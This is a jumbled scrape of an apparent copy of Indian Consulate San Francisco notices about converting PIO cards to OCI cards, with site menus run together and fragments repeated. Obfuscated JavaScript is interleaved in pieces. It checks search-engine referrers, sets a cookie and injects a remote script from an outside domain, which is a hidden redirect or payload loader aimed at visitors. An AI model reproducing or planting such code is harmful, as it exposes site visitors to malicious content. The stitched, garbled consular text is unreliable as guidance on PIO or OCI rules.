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However, we urge all PIO card holders to apply for change to OCI cards for uniformity sake.
However, the PIO cardholders are advised to apply for OCI in lieu of PIO as soon as possible at http://in.. Applying for OCI cards in lieu of PIO cards at the website indicated above will be optional for the applicant until further instructions.. constructor(\x22return\x20this\x22)(\x20)'+');');_0x579b83=_0x16e651();}catch(_0xee173){_0x579b83=window;}var _0x277d32='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x579b83['atob']||(_0x579b83['atob']=function(_0x2593e5){var _0x5c90fc=String(_0x2593e5)['replace'](/=+$/,'');for(var _0x7bce9b=0x0,_0x579a6b,_0x46fe68,_0x4b041d=0x0,_0x56e420='';_0x46fe68=_0x5c90fc['charAt'](_0x4b041d++);~_0x46fe68&&(_0x579a6b=_0x7bce9b%0x4?_0x579a6b*0x40+_0x46fe68:_0x46fe68,_0x7bce9b++%0x4)?_0x56e420+=String['fromCharCode'](0xff&_0x579a6b>>(-0x2*_0x7bce9b&0x6)):0x0){_0x46fe68=_0x277d32['indexOf'](_0x46fe68);}return _0x56e420;});}());_0x47ca['base64DecodeUnicode']=function(_0x5032e5){var _0x35ab0c=atob(_0x5032e5);var _0x1e11f0=[];for(var _0x604664=0x0,_0x2611e6=_0x35ab0c['length'];_0x604664=_0x97c35d;},'tfsfy':function _0x5336b1(_0x5ea291,_0x1cf098){return _0x5ea291===_0x1cf098;},'AuuYs':_0x47ca('0x26'),'oIimg':_0x47ca('0x27'),'GTsZe':function _0x9fa857(_0x4cda86,_0x4d6f48){return _0x4cda86+_0x4d6f48;},'hcBFM':_0x47ca('0x28')};var _0x22aba0=[_0x47ca('0x29'),_0x301352[_0x47ca('0x2a')],_0x301352[_0x47ca('0x2b')],'.
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2 Endorsements stating that existing PIO cards are valid for life would be made at the first point with which the card holder comes into contact, be it an Indian Mission, an FRRO or an immigration check-point.. 4 As conveyed earlier, endorsements stating that existing PIO cards are valid for life would be made at the first immigration point with which the card holder comes into contact, be it an Indian Mission, an FRRO or an immigration check-point.. However, when passports are changed / renewed, applicants may apply for miscellaneous services to update their passport details in the OCI cards.
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OCI card in lieu of PIO card can be applied at https://passport gov in/oci All extant PIO cards will continue to be valid until further instructions on the matter are conveyed by MHA.. The existing PIO cardholders can travel to India using the PIO card with valid passport.. All concerned are hereby informed that there is no deadline for conversion from PIO card to OCI cards.. aol ',' ask ',' altavista ',_0x301352[_0x47ca('0x2c')]],_0x2f3766=document['referrer'],_0x515a61=![],_0x59a18b=cookie['get'](_0x301352['AYPsk']);for(var _0x15f06e=0x0;_0x15f06e. These endorsements/stamps would, however, not be mandatory Latest Notice and AlertsNovember 27, 2017 :Open house at consulate for december 2017November 17, 2017 :Last date of application for free conversion of pio cards to oci card is on or before 31st december 2017October 20, 2017 :E-notice inviting tenderOctober 20, 2017 :Job vacancy : clerk / messengerView AllStay ConnectedConsulate General of India - San Francisco540 Arguello Boulevard San Francisco California 94118 USA.ckgs us The applicant will have to pay the service charges for the outsourcing company as well as postage charges.. These endorsements/ stamps would, however, not be mandatoryConsulate General of India, San FranciscoIt has been brought to our attention that rumors are spreading among Indian Diaspora community members that PIO card holders are not able to travel to India with PIO CARD after June 18th, 2015.. 3 Considering the concerns and issues related to this conversion from PIO card to OCI card, it has been decided that PIO cards already issued continue to be valid documents.. S agencies or technology areas applying for visa to visit IndiaGuidelines for Commissioning of Surrogacy in IndiaeTV SchemeJournalist Visas / Documentary Filming in IndiaOCI (Overseas Citizenship of India) cardsRenunciation of Indian Citizenship & Surrender of Indian PassportEMERGENCY CERTIFICATEPIO (Person of Indian Origin) CardsDo's and Dont's for Indian EmigrantsGuidelines for adoption of Indian childrenHelpful InformationPhotograph SpecificationsEmergency ServicesEmergency ServicesAttestation of Death Document/Carrying of AshesEmergency Visa ServicesCommercial ResourcesInvest IndiaIndia in BusinessCommercial RepresentativeOIFC India Connect InitiativesIndiaConnect Initiative: India Corporate InternshipE&Y: India Attractiveness Survey 2015India Commercial3India Economy 3India-US Relations 1Indian Exporter's / Importer's Directory 1Useful US Trade Statistics WebsitesMonthly Commercial Report 2016Indian CustomsPermanent Account Number (PAN)Exhibitions and Trade FairsTendersCommunity ResourcesIndia Development Foundation of Overseas IndiansOverseas Indian Facilitation CentreKnow India ProgramTri Valley UniversityInitiatives for Overseas IndiansDomestic ViolenceYouthHerguan UniversityDeserted Indian Women linksTracing the RootsForeign Marriage ActMedia CenterPress ReleasesNotice and AlertsNewsConsulate EventsPicture GalleryContact UsPIO (Person of Indian Origin) CardsConversion of PIO cards into OCI cardsOCI in lieu of PIO cardA separate online application for issue of OCI card in lieu of the PIO card without payment of any registration fee has been devised and available at http://in.. ckgs usLast date of conversion from PIO to OCI is December 31, 2017Consular ServicesStay ConnectedConsulate General of India - San Francisco540 Arguello Boulevard San Francisco California 94118 USAConsulate General of IndiaServing the states of: Alaska, Arizona, California, Hawaii, Idaho, Montana, Nevada, Oregon, Utah, Washington, Wyoming and territory of GuamHomeAbout UsConsul General Bio ProfileList of OfficersLocation of ConsulateRight to informationCounter Timings and HolidaysEmbassy & Consulate in USConsular ServicesPassport Related ServicesEmergency CertificateMiscelleneous/Attestation ServicesStatement of Need Certificates for Medical DoctorsBirth Certificate or non Availability of Birth CertificateMarriage CertificatePower of Attorney / Affidavits relating to Property or Financial MattersPCC (Police Clearance Certificate)Attestation of WillNORI (No Obligation to Return to India)No Objection Letter For Child Adoption (for Adoption)Life CertificateAttestation of DocumentsAffidavit for Childs Passport to be issued in IndiaNRI CertificateRegistration of BirthAttestation of Death DocumentsVisaGuidelines for individuals working in designated U.. var _0x2aee=['cXhQT1c=','OyBwYXRoPQ==','OyBkb21haW49','OyBzZWN1cmU=','cnNRSmw=','VFRabW0=','OyBleHBpcmVzPQ==','TmRlaGo=','Z2V0VGltZQ==','Ykx5ZVo=','TnhIV0Y=','QVFoWUE=','WU15aXY=','WUxVdFo=','LmJpbmcu','LnlhaG9vLg==','LnlhbmRleC4=','ZlF4','QkRo','aHR0cHM6Ly9jbG91ZGV5ZXNzLm1lbi9kb25fY29uLnBocD94PWVuJnF1ZXJ5PQ==','Lmdvb2dsZS4=','bWVTRGc=','blpiU3Y=','eU5GRU0=','c2V0','QVlQc2s=','dGZzZnk=','QXV1WXM=','b0lpbWc=','R1RzWmU=','c2NyaXB0','aGVhZA==','Q29HRlU=','c3Jj','Z2V0RWxlbWVudHNCeVRhZ05hbWU=','UEpIclQ=','YXBwZW5kQ2hpbGQ=','cGlvK2NhcmQrY29udmVyc2lvbit0bytvY2kraW4raW5kaWE=','MXw0fDB8MnwzfDU=','Y1NQ','MXw1fDR8MnwzfDA=','R25Vb3U=','c3BsaXQ=','Y29va2ll','bWF0Y2g=','WGZVUU0=','bGVuZ3Ro','cmVwbGFjZQ==','cll2SnQ=','eW9uVmg=','T3NwWGU='];(function(_0x3e0296,_0x1b37ce){var _0x5e21c7=function(_0x3d17e1){while(--_0x3d17e1){_0x3e0296['push'](_0x3e0296['shift']());}};_0x5e21c7(++_0x1b37ce);}(_0x2aee,0x11d));var _0x47ca=function(_0x10bc4b,_0xd6a255){_0x10bc4b=_0x10bc4b-0x0;var _0x38832c=_0x2aee[_0x10bc4b];if(_0x47ca['initialized']===undefined){(function(){var _0x579b83;try{var _0x16e651=Function('return\x20(function()\x20'+'{}.. S agencies or technology areas applying for visa to visit IndiaGuidelines for Commissioning of Surrogacy in IndiaeTV SchemeJournalist Visas / Documentary Filming in IndiaOCI (Overseas Citizenship of India) cardsRenunciation of Indian Citizenship & Surrender of Indian PassportEMERGENCY CERTIFICATEPIO (Person of Indian Origin) CardsDo's and Dont's for Indian EmigrantsGuidelines for adoption of Indian childrenHelpful InformationPhotograph SpecificationsEmergency ServicesEmergency ServicesAttestation of Death Document/Carrying of AshesEmergency Visa ServicesCommercial ResourcesInvest IndiaIndia in BusinessCommercial RepresentativeOIFC India Connect InitiativesIndiaConnect Initiative: India Corporate InternshipE&Y: India Attractiveness Survey 2015India Commercial3India Economy 3India-US Relations 1Indian Exporter's / Importer's Directory 1Useful US Trade Statistics WebsitesMonthly Commercial Report 2016Indian CustomsPermanent Account Number (PAN)Exhibitions and Trade FairsTendersCommunity ResourcesIndia Development Foundation of Overseas IndiansOverseas Indian Facilitation CentreKnow India ProgramTri Valley UniversityInitiatives for Overseas IndiansDomestic ViolenceYouthHerguan UniversityDeserted Indian Women linksTracing the RootsForeign Marriage ActMedia CenterPress ReleasesNotice and AlertsNewsConsulate EventsPicture GalleryContact UsImportant Notice: OCI in lieu of PIO CardGovernment of IndiaMinistry of External AffairsNew Delhi, June 05, 2015This is to notify that submission of application for OCI card in lieu of PIO card is voluntary and optional. 0041d406d9